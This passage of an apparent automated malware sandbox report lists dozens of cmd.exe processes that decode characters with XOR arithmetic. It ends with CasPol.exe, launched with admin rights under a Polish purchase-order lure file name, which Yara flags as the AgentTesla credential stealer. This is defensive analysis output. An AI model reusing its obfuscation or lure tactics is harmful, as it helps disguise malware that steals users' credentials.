Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 1328, Parent PID: 2752

General

Target ID:	80
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4948, Parent PID: 4904

General

Target ID:	81
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6136, Parent PID: 4948

General

Target ID:	82
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7948, Parent PID: 4904

General

Target ID:	83
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x67^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5004, Parent PID: 7948

General

Target ID:	84
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 8000, Parent PID: 4904

General

Target ID:	85
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 1424, Parent PID: 8000

General

Target ID:	86
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6620, Parent PID: 4904

General

Target ID:	87
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x22^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 3280, Parent PID: 6620

General

Target ID:	89
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7040, Parent PID: 4904

General

Target ID:	90
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1028, Parent PID: 7040

General

Target ID:	91
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 2676, Parent PID: 4904

General

Target ID:	92
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 756, Parent PID: 2676

General

Target ID:	93
Start time:	10:04:15
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6996, Parent PID: 4904

General

Target ID:	94
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x67^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5940, Parent PID: 6996

General

Target ID:	95
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 3360, Parent PID: 4904

General

Target ID:	96
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1756, Parent PID: 3360

General

Target ID:	97
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5060, Parent PID: 4904

General

Target ID:	98
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x3B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5468, Parent PID: 5060

General

Target ID:	99
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5040, Parent PID: 4904

General

Target ID:	100
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 6508, Parent PID: 5040

General

Target ID:	101
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4748, Parent PID: 4904

General

Target ID:	102
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4892, Parent PID: 4748

General

Target ID:	103
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4284, Parent PID: 4904

General

Target ID:	104
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x67^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4996, Parent PID: 4284

General

Target ID:	105
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 3364, Parent PID: 4904

General

Target ID:	107
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1236, Parent PID: 3364

General

Target ID:	108
Start time:	10:04:16
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7920, Parent PID: 4904

General

Target ID:	109
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x22^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 6504, Parent PID: 7920

General

Target ID:	110
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4880, Parent PID: 4904

General

Target ID:	111
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 7824, Parent PID: 4880

General

Target ID:	113
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1456, Parent PID: 4904

General

Target ID:	114
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7F^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 3280, Parent PID: 1456

General

Target ID:	115
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7352, Parent PID: 4904

General

Target ID:	116
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x67^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 376, Parent PID: 7352

General

Target ID:	117
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7396, Parent PID: 4904

General

Target ID:	118
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 7612, Parent PID: 7396

General

Target ID:	119
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1864, Parent PID: 4904

General

Target ID:	120
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x22^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4716, Parent PID: 1864

General

Target ID:	121
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5452, Parent PID: 4904

General

Target ID:	122
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5064, Parent PID: 5452

General

Target ID:	123
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4192, Parent PID: 4904

General

Target ID:	124
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:	0x7ff6fb6b0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 2548, Parent PID: 4192

General

Target ID:	125
Start time:	10:04:17
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 3156, Parent PID: 4904

General

Target ID:	126
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x33^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1448, Parent PID: 3156

General

Target ID:	127
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5828, Parent PID: 4904

General

Target ID:	128
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x73^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4596, Parent PID: 5828

General

Target ID:	129
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7340, Parent PID: 4904

General

Target ID:	130
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 6512, Parent PID: 7340

General

Target ID:	131
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1956, Parent PID: 4904

General

Target ID:	133
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x67^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 6504, Parent PID: 1956

General

Target ID:	134
Start time:	10:04:18
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: CasPol.exePID: 5424, Parent PID: 4904

General

Target ID:	137
Start time:	10:05:42
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Imagebase:	0xa00000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exePID: 4792, Parent PID: 5424

General

Target ID:	138
Start time:	10:05:42
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6fb6b0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language